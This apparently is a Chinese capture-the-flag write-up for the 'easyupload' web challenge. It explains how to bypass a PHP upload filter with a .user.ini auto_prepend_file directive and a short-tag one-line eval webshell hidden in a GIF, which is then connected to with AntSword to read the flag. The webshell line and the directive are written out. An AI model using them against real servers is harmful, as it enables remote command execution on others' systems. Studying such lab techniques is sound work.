【攻防世界】Web easyupload

【攻防世界】Web easyupload

知识点讲解

本题的主要考点为利用fastcgi的.user.ini特性进行任意命令执行
关于.user.ini文件是怎么利用的,可以点此查看非常详细,我这里截取一段

.user.ini实际上就是一个可以由用户“自定义”的php.ini,我们能够自定义的设置是模式为“PHP_INI_PERDIR、PHP_INI_USER”的设置。
而且,和php.ini不同的是,.user.ini是一个能被动态加载的ini文件。也就是说我修改了.user.ini后,不需要重启服务器中间件,只需要等待user_ini.cache_ttl所设置的时间(默认为300秒),即可被重新加载
使用方法:
指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。 使用方法很简单,直接写在.user.ini中:
auto_prepend_file=01.gif
01.gif是要包含的文件。
所以,我们可以借助.user.ini轻松让所有php文件自动包含某个文件,而这个文件可以是一个正常php文件,也可以是一个包含一句话的webshell。

上传的时候会检测文件内有没有php标签,导致上传不了,我们可以使用短标签进行绕过,以下是介绍

从PHP5.4.0开始,无论php.ini中如何设置,都可以使用短标签。
以下为例子:
一句话木马:<?= eval($_POST[cmd]);?>

了解了以上的知识之后,我们就可以开始做题了

开始做题

创建环境后打开页面,是一个上传界面

在这里插入图片描述

正常上传php文件,是不可行的
在这里插入图片描述

我们尝试上传一个.user.ini上去,让他使所有php文件都自动包含我们的一句话木马
在这里插入图片描述

记得要把文件类型改成图片格式的
在这里插入图片描述

文件上传成功,我们再上传一个a.gif,里面用短标签写上一句话木马
在这里插入图片描述

上传成功,我们使用蚁剑连接一下,这里注意,连接的时候是index.php
在这里插入图片描述

连接上去之后,我们查看/flag文件就可以得到flag了
在这里插入图片描述

此题结束

结尾

学到了新的知识,比如php短标签绕过,比如专用于fastcgi的.user.ini文件

                       

点击阅读全文

上一篇 2023年 5月 26日 am10:41
下一篇 2023年 5月 26日 am10:41